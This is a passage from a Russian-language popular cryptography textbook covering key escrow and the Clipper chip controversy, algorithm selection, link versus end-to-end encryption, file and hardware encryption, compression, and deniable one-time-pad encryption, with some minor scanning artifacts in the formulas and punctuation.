    1. Используя однонаправленную функцию, Антон преобразует 7-значный идентификатор своего чудачества в другое 7-значное число.

    2. Трактуя полученное на шаге 1 число как телефонный номер, Борис набирает этот номер и оставляет его абоненту свои координаты. Если на вызов никто не отвечает или такого телефонного номера не существует. Антон применяет к нему однонаправленную функцию и получает новое семизначное число. Так продолжается до тех пор, пока кто-нибудь не ответит на телефонный звонок Антона.

    3. Антон сообщает в фирму, сколько раз Борис должен применять однонаправленную функцию, чтобы получить искомый телефонный номер.

    4. С помощью однонаправленной функции Борис преобразует 7-значный идентификатор своего чудачества столько раз, сколько это делал Антон. и получает 7-значное число, которое трактует как телефонный номер. Борис звонит по полученному им номеру и спрашивает, нет ли для него какой-либо информации.

    Следует отметить, что Борис может предпринять атаку с выбранным открытым текстом. Узнав идентификаторы распространенных человеческих чудачеств, Борис будет по очереди перебирать их, применять к ним однонаправленную функцию и звонить по получающимся у него телефонным номерам. Поэтому необходимо сделать так, чтобы количество возможных чудачеств было достаточно велико, и подобного рода атака стала в результате неосуществимой.

    20. Депонирование ключей

     

    С незапамятных времен одним из наиболее распространенных методов слежки является подслушивание, включающее перехват сообщений, которыми обмениваются люди, являющиеся объектами наблюдения. Сегодня, благодаря широкому распространению стойких криптосистем с открытым ключом, у преступников и террористов появилась возможность обмениваться посланиями по общедоступным каналам связи, не боясь подслушивания со стороны кого бы то ни было. В связи с этим у правоохранительных органов возникла настоятельная необходимость при определенных условиях осуществлять оперативный доступ к открытым текстам шифрованных сообщений, циркулирующих в коммерческих коммуникационных сетях.

    В 1993 г. американское правительство впервые публично объявило о своих планах внедрения Стандарта шифрования данных с депонированием ключа. В соответствии с этим стандартом для шифрования данных предполагается использовать защищенную микросхему под названием Clipper, которая снабжается уникальным идентификационным номером и депонируемым ключом. Депонируемый ключ состоит из двух частей, которые раздельно хранятся в двух различных уполномоченных правительственных ведомствах. Для шифрования открытого текста сообщения микросхема генерирует сеансовый ключ. Этот ключ шифруется при помощи депонируемого ключа и в зашифрованном виде присоединяется к шифрованному тексту сообщения вместе с идентификационным номером микросхемы. В случае возникновения необходимости ознакомиться с содержанием сообщения, зашифрованного при помощи микросхемы Clipper, правоохранительным органам достаточно в установленном порядке обратиться в уполномоченные правительственные ведомства за хранящимся там депонируемым ключом, расшифровать с его помощью сеансовый ключ, а затем прочесть искомым открытый текст сообщения.

    В самом общем случае Стандарт шифрования данных с депонированием ключа реализуется с помощью следующего криптографического протокола:

    1. Антон генерирует пару ключей, состоящую из открытого и тайного ключа, и делит их на n частей.

    2. Антон посылает каждую часть тайного ключа и соответствующую ей часть открытого ключа отдельному доверенному лицу.

    3. Каждое доверенное лицо проверяет полученные от Антона части открытого и тайного ключа и помещает их на хранение в надежное место.

    4. Если правоохранительные органы добиваются разрешения ознакомиться с перепиской Антона, они обращаются к его доверенным лицам и реконструируют соответствующий тайный ключ.

    Существуют различные варианты протокола шифрования данных с депонированием ключа. Например, в него можно встроить пороговую схему, чтобы для восстановления тайного ключа нужно было собрать не все n , а лишь не менее m (m<n) частей этого ключа, распределенных Антоном среди своих доверенных лиц. Кроме того, протокол шифрования данных с депонированием ключа можно дополнить действиями, позаимствованными из протокола с неосознанной передачей информации, чтобы доверенные лица не знали, чей конкретно ключ они реконструируют в данный момент по просьбе правоохранительных органов.

    Депонирование ключей и политика

    После заявления американского правительства о планах внедрения Стандарта шифрования данных с депонированием ключа вокруг крошечной кремниевой пластинки по имени Clipper разразился политический конфликт такой силы, что в печати ее вскоре окрестили "Боснией телекоммуникаций". В непримиримой схватке лицом к лицу сошлись защитники национальном безопасности США и поборники гражданских свобод вместе с поставщиками информационных технологий.

    Правительственные агентства США, особенно АНБ, убеждали законодателей в том, что если использование стойких криптосистем станет повсеместным, это даст возможность преступникам и враждебно настроенным странам мешать расследованию их противоправной деятельности. Сторонники депонирования ключей резонно напоминали о том, что успехи криптоаналитических спецслужб англо-американских союзников в значительной мере способствовали достижению победы во второй мировой войне. Важная роль. которую криптоанализ играл в обеспечении безопасности страны, была впоследствии подтверждена и американским послевоенным законодательством. установившим контроль над экспортом шифраторов по тем же правилам, которые действовали в отношении поставок военного снаряжения. Примеру США последовали все государства, производящие коммерческие программы шифрования, причем некоторые из них (Израиль, Россия и Франция) также стали осуществлять контроль над импортом шифровальных средств и их использованием внутри страны.

    Кроме того, в ходе "холодной" войны АНБ неуклонно повышало свой шпионский потенциал. Соответственно росло его влияние на политическую жизнь страны. К началу 90-х годов АНБ превратилось в монстра, внушавшего американским политикам и законодателям благоговейный страх. Для них мнение руководства АНБ было намного весомее возражений его оппонентов. А директор АНБ и его помощники неустанно твердили о том. что недоверие к Стандарту шифрования данных с депонированием ключей вызвано, главным образом, его незнанием. И в этом была доля правды, поскольку значительная часть проекта с самого начала хранилась в строгой тайне, включая сам алгоритм под условным названием Skipjack (Попрыгунчик), используемый для шифрования сообщений.

    Со своей стороны, борцы за гражданские права в США посчитали решение. предложенное американской администрацией, еще большим злом, чем проблемы, с которыми приходилось сталкиваться в борьбе с преступностью и терроризмом. По их мнению, это предложение создавало основу для превращения национальной информационной инфраструктуры США в систему тотальной слежки, которая могла быть использована практически бесконтрольно.

    Сказано круто. Однако несмотря на их экстремизм, борцов за гражданские права поддержали американские бизнесмены, для которых повсеместное внедрение депонирования ключей представлялось слишком сильнодействующим лекарством против преступности и терроризма. Ведь в качестве побочного эффекта оно было способно серьезно задержать развитие американской информационной инфраструктуры. Стандарт шифрования, базирующийся на секретной технологии и обеспечивающий американцам возможность доступа к каналам связи, которые этот стандарт предназначен защищать, вряд ли может рассчитывать на принятие за пределами США. Для сохранения ведущей позиции США на мировом рынке требуются разработка и поддержка общедоступных стандартов защиты информации, которые и равной мере обеспечивают интересы всех без исключения сторон.

    Много неясностей было связано с системой передачи ключей на .хранение. Управляющие банками, компьютерными фирмами и представители других отраслей почти в один голос заявили, что покуда ключи находятся у правительства, игра ведется не по правилам. Некоторые из них даже предложили отдавать ключи в руки неправительственных организаций, как это делается. например, в Австралии и Канаде.

    Кроме того, депонирование ключей обладает одним неустранимым дефектом. Хорошая практика защиты сообщений с помощью шифрования состоит в том, чтобы хранить ключи к шифрам только в течение короткого периода времени, пока эти ключи действительно нужны. Затем устаревшие ключи уничтожаются, после чего вероятность их воссоздания практически равна нулю. Предложение передавать ключи на хранение лишает шифрование этого преимущества, поскольку требует, чтобы ключи хранились бесконечно долго и могли быть использованы для прочтения более ранних шифрованных сообщений.

    В настоящее время несколько влиятельных американских компаний занимаются разработкой и внедрением альтернативных правительственным систем надежного копирования ключей и хранения полученных копий в интересах корпораций и индивидуальных пользователей. Ведь многие из них сталкиваются с проблемой доступа к зашифрованным файлам, когда их работники скоропостижно умирают, увольняются, уезжают в отпуск, заболевают или просто бесследно исчезают. Различие между передачей копий ключей правительству и хранением их в частном агентстве может для кого-то показаться несущественным, но для корпораций эта разница может быть решающей.

    Коммерческие программные средства со встроенным депонированием ключей шифруют файлы, используя стандартные алгоритмы шифрования, и завершают эту процедуру добавлением зашифрованной копии использованного ключа в полученный файл. Шифрование ключа производится с помощью другого ключа. Как правило, это открытый ключ службы депонирования. После этого обеспечить доступ к информации в файле могут либо владелец исходного ключа, который был использован для шифрования файла, либо частное агентство, где хранится соответствующий секретный ключ, который был применен для шифрования исходного ключа.

    О своей готовности выступить в качестве держателей депонированных секретных ключей заявили многие американские компании, производящие программное обеспечение. Но у них неожиданно появились серьезные конкуренты: расширить пределы своей компетенции до хранения секретных криптографических ключей собрались банки.

    Таким образом, в конкурентную борьбу за право хранить у себя резервные копии ключей к чужим шифрам вступили правительство, частные фирмы. банки. Кто из них станет победителем в этом соревновании, — пока неясно. Вероятно, будет найден какой-то компромиссный вариант, который удовлетворит все соревнующиеся стороны.

     

    Глава 8. Надежность криптосистем

    Глава 8. Надежность криптосистем

    1. Как выбрать хороший криптографический алгоритм

     

    Как выбрать хороший криптографический алгоритм

    Безопасность криптосистем можно сравнить с надежностью цепи: чем крепче ее самое слабое звено, тем труднее порвать эту цепь. В хорошей криптосистеме должно быть досконально проверено все — алгоритм, протокол. ключи и т. п. Если криптографический алгоритм достаточно стоек, а генератор случайных чисел, используемый для порождения ключей, никуда не годится, любой опытный криптоаналитик в первую очередь обратит внимание именно на него. Если удастся улучшить генератор, но не будут зачищены ячейки памяти компьютера после того, как в них побывал сгенерированный ключ, грош цена такой безопасности.

    Рассмотрим следующую ситуацию. В криптосистеме применяются стойкий криптографический алгоритм и действительно случайные ключи, которые аккуратно удаляются из памяти компьютера после их использования. Однако перед шифрованием файл, в котором наряду с вашим адресом и фамилией указаны все ваши доходы за текущий год, был по ошибке отправлен электронной почтой в налоговую службу. В этом случае можно спросить. зачем тогда вам понадобились и стойкий алгоритм, и случайные ключи, и зачистка компьютерной памяти в придачу?!

    Криптографу не позавидуешь: в проектируемой им криптосистеме он должен предусмотреть защиту от атак всех типов, какие только сможет придумать воспаленное воображение криптоаналитика. Криптоаналитику же наоборот достаточно отыскать единственное слабое звено в цепи криптографической зашиты и организовать атаку только против этого звени.

    Кроме этого, всегда следует учитывать, что на практике угроза информационной безопасности любого объекта исходит не только от криптоаналитика. В конце концов, каким бы длинным ни был криптографический ключ, используемый вами для шифрования файлов, все равно, если правоохранительным органам понадобится узнать, что хранится в вашем компьютере. они просто установят камеру и скрупулезно запишут всю информацию, появляющуюся на его экране. Недаром, по признанию официальных лип из АНБ, большинство сбоев в обеспечении информационной безопасности происходит не из-за найденных слабостей в криптографических алгоритмах и протоколах, а из-за вопиющих оплошностей при их реализации. Какой бы стойкостью ни обладал криптографический алгоритм, ее не требуется преодолевать в лоб, т. к. при успешной атаке ее удается попросту обойти. Однако и пренебрегать хорошими криптографическими алгоритмами тоже не следует, чтобы криптография не стала самым слабым звеном в цепи, которое не выдержит напора атакующего.

    При выборе хорошего криптографического алгоритма можно:

    • воспользоваться известным алгоритмом, сравнительно давно опубликованным в специальном издании, посвященном проблемам криптографии (если никто пока не сообщил о том, что сумел вскрыть этот алгоритм. значит на него следует обратить внимание);
    • довериться известной фирме, специализирующейся на продаже средств шифрования (вряд ли эта фирма будет рисковать своим добрым именем. торгуя нестойкими криптографическими алгоритмами);
    • обратиться к независимому эксперту (непредвзятость во мнении позволит ему объективно оценить достоинства и недостатки различных криптографических алгоритмов);
    • обратиться за поддержкой в соответствующее правительственное ведомство (вряд ли правительство будет вводить своих граждан в заблуждение. давая им ложные советы относительно стойкости того пли иного криптографического алгоритма);
    • попытаться создать собственный криптографический алгоритм.

    Все перечисленные варианты имеют существенные изъяны. Не следует полагаться только на одну фирму, на одного эксперта или на одно ведомство. Многие люди, называющие себя независимыми экспертами, мало понимают в криптографии. Большинство фирм, производящих средства шифрования, — тоже ничуть не лучше. В АНБ и ФАПСИ работают лучшие криптографы в мире, однако по понятным соображениям они не спешат поделиться своими секретами с первым встречным. Впрочем, и со вторым тоже. И даже если вы гений в области криптографии, глупо использовать криптографический алгоритм собственного изобретения без того, чтобы его всесторонне не проанализировали и не протестировали опытные криптологи.

    Поэтому наиболее предпочтительной представляется первая из перечисленных возможностей. Данный подход к оценке стойкости криптографических алгоритмов можно было бы признать идеальным, если бы не один его не- достаток. К сожалению, ничего не известно о результатах криптоаналитических исследований этих алгоритмов, которые несомненно активно велись в .прошлом и продолжают также активно проводиться во всем мире многочисленными сотрудниками различных правительственных ведомств, в компетенцию которых входят криптологические изыскания. Эти ведомства, скорее ; всего, гораздо лучше финансируются, чем академические институты, ведущие аналогичные исследования. Да и начали они заниматься криптологией значительно раньше, чем ученые, не имеющие воинских званий, и специалисты из частных фирм. Поэтому можно предположить, что военные нашли гораздо более простые способы вскрытия известных шифров, нежели те, которые изобретены за пределами строго охраняемых зданий сверхсекретных правительственных ведомств.

    Ну и пусть. Даже если вас арестуют и в качестве улики конфискуют у вас жесткий диск с файлами, зашифрованными по DES-алгоритму. вряд ли криптоаналитики, состоящие на государственной службе, придут на судебное заседание, чтобы клятвенно подтвердить, что данные для вашего обвинительного заключения получены путем дешифрования конфискованных файлов. Тот факт, что можно вскрыть какой-то конкретный криптографический алгоритм, часто является значительно большим секретом, чем информация, полученная путем вскрытия этого алгоритма.

    Лучше исходить из предположения, что АНБ, ФАПСИ и иже с ними могут , прочесть любое сообщение, которое они пожелают прочесть. Однако эти ведомства не в состоянии читать все сообщения, с содержанием которых хотят ознакомиться. Главной причиной является ограниченность в средствах, ассигнуемых правительством на криптоанализ. Другое разумное предположение состоит в том, что компетентным органам гораздо легче получить доступ к зашифрованной информации с помощью грубой физической силы, чем путем изящных, но очень трудоемких математических выкладок, приводящих к вскрытию шифра.

    Однако в любом случае гораздо надежнее пользоваться известным криптографическим алгоритмом, который придуман уже довольно давно и сумел выстоять против многочисленных попыток вскрыть его, предпринятых авторитетными криптологами.

    Криптографические алгоритмы, предназначенные для экспорта из США

    В настоящее время у пользователей персональных компьютеров имеется возможность применять алгоритмы шифрования, встроенные в различные программные продукты. Достаточно приобрести, например, текстовый редактор Word, редактор электронных таблиц Excel или операционные системы Windows NT и NetWare. Кроме встроенных алгоритмов шифрования, все эти программные продукты имеют еще одно общее свойство: они изготовлены в Соединенных Штатах. Прежде чем начать торговать ими за рубежом, американские производители в обязательном порядке должны получить разрешение у своего правительства на экспорт данных продуктов за пределы США.

    Многие придерживаются сейчас такого мнения: ни один криптографический алгоритм, разрешенный к экспорту из США, не является достаточно стойким, чтобы его не могли вскрыть криптоаналитики из АНБ. Считается, что американские компании, желающие продавать за рубежом свою продукцию, которая позволяет шифровать данные, по настоянию АНБ переделывают используемые криптографические алгоритмы так, что:

    • время от времени отдельные биты ключа подмешиваются в шифртекст;
    • ключ имеет длину всего 30 бит вместо официально заявляемых 100 бит, поскольку большинство ключей оказываются эквивалентны;
    • в начало каждого шифруемого сообщения вставляется фиксированный заголовок, чтобы облегчить криптоаналитическую атаку со знанием открытого текста;
    • любое шифрованное сообщение содержит некоторый фрагмент открытого текста вместе с соответствующим ему шифртекстом.

    Исходные тексты американских шифровальных программ передаются на хранение в АНБ, однако за пределами этого сверхсекретного агентства доступ к ним закрыт наглухо. Вполне естественно, что ни АНБ, ни американские компании, получившие от АНБ разрешение на экспорт своих шифровальных средств, не заинтересованы в рекламе слабостей криптографических алгорт-мов, положенных в основу функционирования этих средств. Поэтому желательно проявлять осторожность, если вы собираетесь защищать свои данные при помощи американских программ шифрования, экспорт которых за пределы страны разрешен правительством США.

     

    2. Симметричный или асимметричный криптографический алгоритм?

    Симметричный или асимметричный криптографический алгоритм?

    Какой алгоритм лучше — симметричный или асимметричный? Вопрос не вполне корректен, поскольку предусматривает использование одинаковых критериев при сравнении криптосистем с секретным и открытым ключами. А таких критериев просто не существует.

    Тем не менее, дебаты относительно достоинств и недостатков двух основных видов криптосистем ведутся давно, начиная с момента изобретения первого алгоритма с открытым ключом. Отмечено, что симметричные криптографические алгоритмы имеют меньшую длину ключа и работают быстрее, чем асимметричные.

    Однако, по мнению американского криптолога У. Диффи — одного из и изобретателей криптосистем с открытым ключом— их следует рассматривав не как совершенно новую разновидность универсальных криптосистем. Криптография с открытым ключом и криптография с секретным ключом предназначены для решения абсолютно разных проблем, связанных с засекречиванием информации. Симметричные криптографические алгоритмы служат для шифрования данных, они работают на несколько порядком быстрее, чем асимметричные алгоритмы. Однако криптография с открытым ключом успешно используется в таких областях, для которых криптография с секретным ключом подходит плохо, — например, при работе с ключами и с подавляющим большинством криптографических протоколов.

    3. Шифрование в каналах связи компьютерной сети

    Шифрование в каналах связи компьютерной сети

    Одной из отличительных характеристик любой компьютерной сети является ее деление на так называемые уровни, каждый из которых отвечает за соблюдение определенных условий и выполнение функций, необходимых для общения между компьютерами, связанными в сеть. Это деление на уровни имеет фундаментальное значение для создания стандартных компьютерных сетей. Поэтому в 1984 г. несколько международных организаций и коми готов объединили свои усилия и выработали примерную модель компьютерной сети, известную под названием OSI (Open . Systems Interconnection — Модель открытых сетевых соединений).

    Согласно модели OSI коммуникационные функции разнесены по уровням. Функции каждого уровня независимы от функций ниже- и вышележащих уровней. Каждый уровень может непосредственно общаться только с двумя соседними. Модель OSI определяет 7 уровней: верхние 3 служат для связи с конечным пользователем, а нижние 4 ориентированы на выполнение коммуникационных функций в реальном масштабе времени.

    Теоретически шифрование данных для передачи по каналам связи компьютерной сети может осуществляться на любом уровне модели OSI. На практике" это обычно делается либо на самых нижних, либо на самых верхних уровнях. Если данные шифруются на нижних уровнях, шифрование называется канальным, а если на верхних, то такое шифрование называется сквозным. Оба этих подхода к шифрованию данных имеют свои преимущества и недостатки.

    Канальное шифрование

    При канальном шифровании шифруются абсолютно все данные, проходящие по каждому каналу связи, включая открытый текст сообщения, а также информацию о его маршрутизации и об используемом коммуникационном протоколе. Однако в этом случае любой интеллектуальный сетевой узел (например, коммутатор) будет вынужден расшифровывать входящий поток данных, чтобы соответствующим образом его обработать, снова зашифровать и передать на другой узел сети.

    Тем не менее канальное шифрование представляет собой очень эффективное средство защиты информации в компьютерных сетях. Поскольку шифрованию подлежат все данные, передаваемые от одного узла сети к другому, у криптоаналитика нет никакой дополнительной информации о том, кто служит источником этих данных, кому они предназначены, какова их структура и т. д. А если еще позаботиться и о том, чтобы, пока канал простаивает, передавать по нему случайную битовую последовательность, сторонний наблюдатель не сможет даже сказать, где начинается и где заканчивается текст передаваемого сообщения.

    Не слишком сложной является и работа с ключами. Одинаковыми ключами следует снабдить только два соседних узла сети связи, которые затем могут менять используемые ключи независимо от других пар узлов.

    Самый большой недостаток канального шифрования заключается в том, что данные приходится шифровать при передаче по каждому физическому каналу компьютерной сети. Отправка информации в незашифрованном виде по какому-то из каналов ставит под угрозу обеспечение безопасности всей сети. В результате стоимость реализации канального шифрования в больших сетях может оказаться чрезмерно высокой.

    Кроме того, при использовании канального шифрования дополнительно потребуется защищать каждый узел компьютерной сети, по которому передаются данные. Если абоненты сети полностью доверяют друг другу и каждый ее узел размещен там, где он защищен от злоумышленников, на этот недостаток канального шифрования можно не обращать внимания. Однако на практике такое положение встречается чрезвычайно редко. Ведь в каждой фирме есть конфиденциальные данные, знакомиться с которыми могут только сотрудники одного определенного отдела, а за его пределами доступ к этим данным необходимо ограничивать до минимума.

    Сквозное шифрование

    При сквозном шифровании криптографический алгоритм реализуется на одном из верхних уровней модели OSI. Шифрованию подлежит только содержательная часть сообщения, которое требуется передать по сети. После зашифрования к ней добавляется служебная информация, необходимая для маршрутизации сообщения, и результат переправляется на более низкие уровни с целью отправки адресату.

    Теперь сообщение не требуется постоянно расшифровывать и зашифровывать при прохождении через каждый промежуточный узел сети связи. Сообщение остается зашифрованным на всем пути от отправителя к получателю.

    Основная проблема, с которой сталкиваются пользователи сетей, где применяется сквозное шифрование, связана с тем, что служебная информация. используемая для маршрутизации сообщений, передается по сети в незашифрованном виде. Опытный криптоаналитик может извлечь для себя массу полезной информации, зная кто с кем, как долго и в какие часы общается через компьютерную сеть. Для этого ему даже не потребуется быть в курсе предмета общения.

    По сравнению с канальным, сквозное шифрование характеризуется более сложной работой с ключами, поскольку каждая пара пользователей компьютерной сети должна быть снабжена одинаковыми ключами, прежде чем они смогут связаться друг с другом. А поскольку криптографический алгоритм реализуется на верхних уровнях модели OSI, приходится также сталкиваться со многими существенными различиями в коммуникационных протоколах и интерфейсах в зависимости от типов сетей и объединяемых в сеть компьютеров. Все это затрудняет практическое применение сквозного шифрования.

    Комбинированное шифрование

    Комбинация канального и сквозного шифрования данных в компьютерной сети обходится значительно дороже, чем каждое из них по отдельности. Однако именно такой подход позволяет наилучшим образом защитить данные, передаваемые по сети. Шифрование в каждом канале связи не позволяет противнику анализировать служебную информацию, используемую для маршрутизации. А сквозное шифрование уменьшает вероятность доступа к незашифрованным данным в узлах сети.

    При комбинированном шифровании работа с ключами ведется так: сетевые администраторы отвечают за ключи, используемые при канальном шифровании, а о ключах, применяемых при сквозном шифровании, заботятся сами пользователи.

    4. Шифрование файлов

     

    На первый взгляд, шифрование файлов можно полностью уподобить шифрованию сообщений, отправителем и получателем которых является одно и то же лицо, а средой передачи служит одно из компьютерных устройств хранения данных (магнитный или оптический диск, магнитная лента, оперативная память). Однако все не так просто, как кажется на первый взгляд.

    Если при передаче по коммуникационным каналам сообщение затеряется по пути от отправителя к получателю, его можно попытаться передать снова. При шифровании данных, предназначенных для хранения в виде компьютерных файлов, дела обстоят иначе. Если вы не в состоянии расшифровать свой файл, вам вряд ли удастся сделать это и со второй, и с третьей, и даже с сотой попытки. Ваши данные будут потеряны раз и навсегда. Это означает, что при шифровании файлов необходимо предусмотреть специальные механизмы предотвращения возникновения ошибок в шифртексте.

    Криптография помогает превратить большие секреты в маленькие. Вместо того чтобы безуспешно пытаться запомнить содержимое огромного файла, человеку достаточно его зашифровать и сохранить в памяти использованный для этой цели ключ. Если ключ применяется для шифрования сообщения, то его требуется иметь под рукой лишь до тех пор, пока сообщение не дойдет до своего адресата и не будет им успешно расшифровано. В отличие от сообщений, шифрованные файлы могут храниться годами, и в течение всего этого времени необходимо помнить и держать в секрете соответствующий ключ.

    Есть и другие особенности шифрования файлов, о которых необходимо помнить вне зависимости от применяемого криптографического алгоритма:

    • нередко после шифрования файла его незашифрованная копия остается на другом магнитном диске, на другом компьютере или в виде распечатки, сделанной на принтере;
    • размер блока в блочном алгоритме шифрования может значительно превышать размер отдельной порции данных в структурированном файле, в результате чего зашифрованный файл окажется намного длиннее исходного;
    • скорость шифрования файлов при помощи выбранного для этой цели криптографического алгоритма должна соответствовать скоростям, на которых работают устройства ввода/вывода современных компьютеров;
    • работа с ключами является довольно непростым делом, поскольку разные пользователи должны иметь доступ не только к различным файлам, но и к отдельным частям одного и того же файла.

    Если файл представляет собой единое целое (например, содержит отрезок текста), восстановление этого файла в исходном виде не потребует больших усилий: перед использованием достаточно будет просто расшифровать весь файл. Однако если файл структурирован (например, разделен на записи и поля, как это делается в базах данных), то расшифровывание всего файла целиком каждый раз, когда необходимо осуществить доступ к отдельной порции данных, сделает работу с таким файлом чрезвычайно неэффективной. Шифрование порций данных в структурированном файле делает его уязвимым по отношению к атаке, при которой злоумышленник отыскивает в этом файле нужную порцию данных и заменяет ее на другую по своему усмотрению.

    У пользователя, который хочет зашифровать каждый файл, размешенный на жестком диске компьютера, имеются две возможности. Если он использует один и тот же ключ для шифрования всех файлов, то впоследствии окажемся не в состоянии разграничить доступ к ним со стороны других пользователей. Кроме того, в результате у криптоаналитика будет много шифртекста, полученного на одном ключе, что существенно облегчит вскрытие этого ключа.

    Лучше шифровать каждый файл на отдельном ключе, а затем зашифрован, все ключи при помощи мастер-ключа. Тем самым пользователи будут избавлены от суеты, связанной с организацией надежного хранения множества ключей. Разграничение доступа групп пользователей к различным файлам будет осуществляться путем деления множества всех ключей на подмножества и шифрования этих подмножеств на различных мастер-ключах. Стойкость такой криптосистемы будет значительно выше, чем в случае использования единого ключа для шифрования всех файлов на жестком диске, поскольку ключи, применяемые для шифрования файлов, можно генерировать случайным образом и, следовательно более стойкими против словарной атаки.  

    5. Аппаратное и программное шифрование

    Аппаратное и программное шифрование

    Аппаратное шифрование

    Большинство средств криптографической защиты данных реализовано в виде специализированных физических устройств. Эти устройства встраиваются в линию связи и осуществляют шифрование всей передаваемой но ней информации. Преобладание аппаратного шифрования над программным обусловлено несколькими причинами.

    • Более высокая скорость. Криптографические алгоритмы состоят из огромного числа сложных операций, выполняемых над битами открытого текста. Современные универсальные компьютеры плохо приспособлены для эффективного выполнения этих операций. Специализированное оборудование умеет делать их гораздо быстрее.
    • Аппаратуру легче физически защитить от проникновения извне. Программа. выполняемая на персональном компьютере, практически беззащитна. Вооружившись отладчиком, злоумышленник может внести в нее скрытые изменения, чтобы понизить стойкость используемого криптографического алгоритма, и никто ничего не заметит. Что же касается аппаратуры, то она обычно помещается в особые контейнеры, которые делают невозможным изменение схемы ее функционирования. Чип покрывается специальным химическим составом, и в результате любая попытка преодолеть защитный слой этого чипа приводит к самоуничтожению его внутренней логической структуры. И хотя иногда электромагнитное излучение может служить хорошим источником информации о том, что происходит внутри микросхемы, от этого излучения легко избавиться, заэкранировав микросхему. Аналогичным образом можно заэкранировать и компьютер, однако сделать это гораздо сложнее, чем миниатюрную микросхему.
    • Аппаратура шифрования более проста в установке. Очень часто шифрование требуется там, где дополнительное компьютерное оборудование является совершенно излишним. Телефоны, факсимильные аппараты и модемы значительно дешевле оборудовать устройствами аппаратного шифрования, чем встраивать в них микрокомпьютеры с соответствующим программным обеспечением.

    Даже в компьютерах установка специализированного шифровального оборудования создает меньше проблем, чем модернизация системного программного обеспечения с целью добавления в него функций шифрования данных. В идеале шифрование должно осуществляться незаметно для пользователя. Чтобы добиться этого при помощи программных средств, средства шифрования должны быть упрятаны глубоко в недра операционной системы. С готовой и отлаженной операционной системой проделать это безболезненно не так-то просто. Но даже любой непрофессионал сможет подсоединить шифровальный блок к персональному компьютеру, с одной стороны, и к внешнему модему, с другой.

    Современный рынок аппаратных средств шифрования информации предлагает потенциальным покупателям 3 разновидности таких средств — самодостаточные шифровальные модули (они самостоятельно выполняют всю работу с ключами), блоки шифрования в каналах связи и шифровальные платы расширения для установки в персональные компьютеры. Большинство устройств первого и второго типов являются узко специализированными. и поэтому прежде, чем принимать окончательное решение об их приобретении, необходимо досконально изучить ограничения, которые при установке накладывают эти устройства на соответствующее "железо", операционные системы и прикладное программное обеспечение. А иначе можно выбросить деньги на ветер, ни на йоту не приблизившись к желанной цели. Правда, иногда выбор облегчается тем, что некоторые компании торгуют коммуникационным оборудованием, которое уже имеет предустановленную аппаратуру шифрования данных.

    Платы расширения для персональных компьютеров являются более универсальным средством аппаратного шифрования и обычно могут быть легко сконфигурированы таким образом, чтобы шифровать всю информацию, которая записывается на жесткий диск компьютера, а также все данные, пересылаемые на дискеты и в последовательные порты. Как правило, зашита от электромагнитного излучения в шифровальных платах расширения отсутствует, поскольку нет смысла защищать эти платы, если аналогичные меры не предпринимаются в отношении всего компьютера.

    Программное шифрование

    Любой криптографический алгоритм может быть реализован в виде соответствующей программы. Преимущества такой реализации очевидны: программные средства шифрования легко копируются, они просты в использовании, их нетрудно модифицировать в соответствии с конкретными потребностями.

    Во всех распространенных операционных системах имеются встроенные средства шифрования файлов. Обычно они предназначены для шифрования отдельных файлов, и работа с ключами целиком возлагается на пользователя. Поэтому применение этих средств требует особого внимания. Во-первых, ни в коем случае нельзя хранить ключи на диске вместе с зашифрованными с их помощью файлами, а во-вторых, незашифрованные копии файлов необходимо удалить сразу после шифрования.

    Конечно, злоумышленник может добраться до компьютера и незаметно внести нежелательные изменения в программу шифрования. Однако основная проблема состоит отнюдь не в этом. Если злоумышленник в состоянии проникнуть в помещение, где установлен компьютер, он вряд ли будет возиться с программой, а просто установит скрытую камеру в стене, подслушивающее устройство — в телефон или датчик для ретрансляции электромагнитного излучения — в компьютер. В конце концов, если злоумышленник может беспрепятственно все это сделать, сражение с ним проиграно, даже еще не начавшись.

    6. Сжатие и шифрование

    Алгоритмы сжатия данных очень хорошо подходят для совместного использования с криптографическими алгоритмами. Тому есть две причины:

    • При вскрытии шифра криптоаналитик, как правило, полагается на избыточность, свойственную любому открытому тексту. Сжатие помогает избавиться от этой избыточности.
    • Шифрование данных является весьма трудоемкой операцией. При сжатии уменьшается длина открытого текста, за счет чего сокращается время, которое будет потрачено на его шифрование.

    Надо только не забыть сжать файл до того, как он будет зашифрован. После шифрования файла при помощи качественного криптографического алгоритма полученный шифртекст сжать не удастся, поскольку его характеристики будут близки к характеристикам совершенно случайного набора букв. Кстати, сжатие может служить своеобразным тестом для проверки качества криптографического алгоритма: если шифртекст поддается сжатию, значит этот алгоритм лучше заменить на более совершенный.

    7. Как спрятать один шифртекст в другом

    Антон и Борис несколько месяцев обменивались шифрованными сообщениями. Контрразведка перехватила все эти сообщения, но так и не смогла прочесть ни единого слова. Контрразведчикам надоело коллекционировать переписку Антона и Бориса, не зная ее содержания, и они решили арестовать подозрительную парочку. Первый же допрос начался словами: "Где ключи к шифру?" "К какому такому шифру?!" — в один голос воскликнули Антон и Борис, но тут же осеклись и побледнели, заметив на столе у следователя зловещего вида клещи, покрытые пятнами то ли ржавчины, то ли крови.

    Антон и Борис смогли бы выкрутиться из создавшегося положения, если бы шифровали каждое свое сообщение так, чтобы оно допускало два различных расшифрования в зависимости от используемого ключа. Свое настоящее секретное сообщение Борису Антон мог бы зашифровать на одном ключе, а вполне невинный открытый текст — на другом. Теперь, если от Антона потребуют ключ к шифру, он отдаст подставной ключ, который позволит прочесть невинное сообщение, а другой ключ сохранит в тайне.

    Самый простой способ сделать это потребует использования одноразового блокнота. Пусть Р — секретный открытый текст, D — невинный открытый текст, С — шифрованный текст, К — настоящий ключ, а К — подставной ключ. Антон шифрует Р:

    Р Å   К = С

    Поскольку у Бориса имеется копия ключа К, он может без проблем расшифровать сообщение Антона:

    С Å  К = Р

    Если контрразведчики попытаются заставить Антона и Бориса выдать используемый ими ключ, то вместо К они могут сообщить в контрразведку:

    К '= С Å  D

    В результате контрразведчики смогут прочитать невинный открытый текст:

    С Å  К ' = D

    Так как Антон и Борис пользуются одноразовым блокнотом, то К является полностью случайным и доказать, что К является подставным ключом, практически невозможно (не прибегая к пыткам).

    Антон мог бы зашифровать Р не с помощью одноразового блокнота, а пользуясь любым из своих самых любимых криптографических алгоритмов и ключом К. Сложив С с фрагментом какого-либо общеизвестного произведения (например, с отрывком из второй главы "Идиота") по модулю 2, Антон получит К'. Теперь если к Антону пристанут злые "дяденьки" из контрразведки, он предъявит им С вместе с К' и скажет, что К' — это одноразовый блокнот для С и что он просто захотел попрактиковаться н криптографии, зашифровав для этой цели отрывок из первой попавшейся книги. И пока контрразведчики не получат в свое распоряжение ключ К, доказать, что Антон занимался чем-то противозаконным, они не смогут.

    8. Почему криптосистемы ненадежны

     

     

